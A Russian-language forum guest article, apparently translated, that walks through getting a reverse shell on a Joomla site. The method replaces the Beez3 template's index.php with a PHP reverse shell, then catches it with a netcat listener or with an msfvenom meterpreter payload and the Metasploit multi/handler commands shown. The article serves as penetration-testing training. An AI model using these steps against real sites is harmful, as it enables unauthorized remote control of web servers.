• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Гостевая статья Joomla: Reverseshell

Joomla - это одна из популярных систем управления контентом (CMS), которая помогает вам создать свой веб-сайт. Joomla приобрела свою популярность благодаря простоте использования, легкой настройке во время установки; и относительной надежности. В этой статье мы узнаем, как получить обратную оболочку Joomla.

Как вы можете видеть на изображении ниже, сайт сделан на Joomla. Теперь, когда у нас есть среда Joomla, мы начинаем ее использовать.

1 (3).png


Атака, которую мы собираемся показать, относится к категории постэксплуатационных; это означает, что нужно иметь учетные данные Joomla. URL-адрес страницы входа в Joomla будет состоять из «joomla/administrator», и здесь введите имя пользователя и пароль, как показано на рисунке ниже:

2 (3).png


После того, как вы вошли в систему, перейдите к расширениям. Появится выпадающее меню, из этого меню выберите шаблоны; как показано на рисунке ниже:

3 (3).png


Вам отобразитса список шаблонов, представленных на веб-сайте, и поэтому мы будем использовать один из них, то есть детали и файлы Beez3.

4 (3).png


Когда вы окажетесь в шаблоне, перейдите к index.php, как показано на рисунке ниже:

5 (3).png


Таким образом, вы сможете редактировать index.php в шаблоне, как вы можете видеть на картинке ниже:

6 (3).png


Теперь подмените код index.php с на reverse shell, который есть в Kali Linux, и добавьте свой IP-адрес и порт в коде, как показано на рисунке ниже:

7 (3).png


Теперь активируйте netcat, чтобы получить сеанс с помощью следующей команды:
nc -lvp 1234

8 (3).png


Другой способ получить reverse shell - msfvenom, и для этого типа используйте следующую команду:
msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R

9 (3).png


Приведенная выше команда выдаст вам вредоносный код php. Подмените этот код, как и прежде, и одновременно запустите multi/handler, как показано на рисунке ниже:

Код:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.9
set lport 1234
exploit

10 (2).png


Это были два способа получить обратную оболочку в Joomla.

Перевод:
 
Последнее редактирование:
  • Нравится
Реакции: Andhacker
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!